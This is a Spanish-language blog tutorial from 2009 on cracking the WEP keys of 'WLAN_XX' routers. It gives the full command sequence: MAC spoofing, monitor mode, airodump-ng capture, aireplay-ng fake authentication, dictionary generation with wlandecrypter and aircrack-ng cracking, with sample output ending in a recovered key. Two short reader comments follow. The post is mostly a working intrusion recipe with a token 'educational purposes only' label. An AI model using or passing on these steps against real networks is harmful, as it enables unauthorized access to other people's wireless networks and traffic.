29 de diciembre de 2009

Tutorial Wlandecrypter (Cómo crackear wlan_xx)

Crackear wlan_xx con Wlandecrypter

Asociación 

1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
  • airmon-ng stop eth1

2- Parar la tarjeta para poder fijarla en modo monitor.
  • ifconfig eth1 down

3- Cambiar la ruta mac.
  • macchanger --mac 00:11:22:33:44:55 eth1

4- Iniciar tarjeta en modo monitor.
  • airmon-ng start eth1

5- Iniciar airodump para ver las redes inalámbricas disponibles.
  • airodump-ng eth1

6- Iniciar airodump con la red especificada.
  • airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1

Falsa autenticación

Si estas recibiendo paquetes, sobra hacer una falsa autentificación, si no, escribe:
  • aireplay-ng -1 0 -e (nombre de la red) -a (El bssid) -h (Nuestra tarjeta mac o la del cliente conectado) eth1

Crackeo

Si estas interesado en el tema y quieres saber porqué los WLAN_XX son tan vulnerables, mira aquí.

- Crackear un WLAN_XX es tan simple como generar un diccionario a partir de la mac interna del router. Nos bastarán unos 3-4 iv's para adivinar ésta.


Escribimos:
  • wlandecrypter "El bssid" "El essid" "el nombre del diccionario"

Nos quedaría, por ejemplo:
wlandecrypter 00:02:CF:XX:FC:51 WLAN_XX dic.txt

- Ahora vamos a emplear este diccionario junto al paquete de iv's.
Para ello, escribimos:

  • aircrack-ng -w "ruta diccionario" "archivo .cap"

Nos quedaría:
aircrack-ng -w /root/dic.txt output-01.cap


Opening output-01.cap
Read 30730 packets.

# BSSID ESSID Encryption

1 00:02:CF:XX:FC:51 WLAN_XX WEP
Choosing first network as target.

Aircrack-ng 0.9.3


[00:00:00] Tested 0 keys (got 118 IVs)
Aircrack-ng 0.9.3
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ [00:00:00] Tested 2940 keys (got 118 IVs)
2 0/ 0 00( 0) 00Aircrack-ng 0.9.30( 0) 00( 0)
KB depth byte(vote)0( 0) 00( 0) 00( 0) 00( 0)
-...........-

KEY FOUND! [ 5a 30 30 30 32 43 46 45 38 31 43 58 58 ] (ASCII: Z00 02CFE81CXX )
Decrypted correctly: 100%

**TUTORIAL BY MONZI_SEZ**
EDUCATIONAL PURPOSES ONLY

*Más que nada este tutorial es un recordatorio para mí mismo, a veces me da pereza mirar la ayuda (por muy simple que sea .p ). Esto lo sabía ya hace muuucho tiempo pero como hoy me encontré una wlan_xx y no salía pues,, tuto XD.

3 comentarios:

  1. hola,cuando en el paso de falsa autntificacion dices, nuestra tarjeta mac o la del cliente conectado,a que te refieres??? :S

    ResponderEliminar
  2. Genial, no sabía cómo obligar a la tarjeta a apagarse antes de entrar en modo monitor "ifconfig eth1 down"

    Gracias!

    ResponderEliminar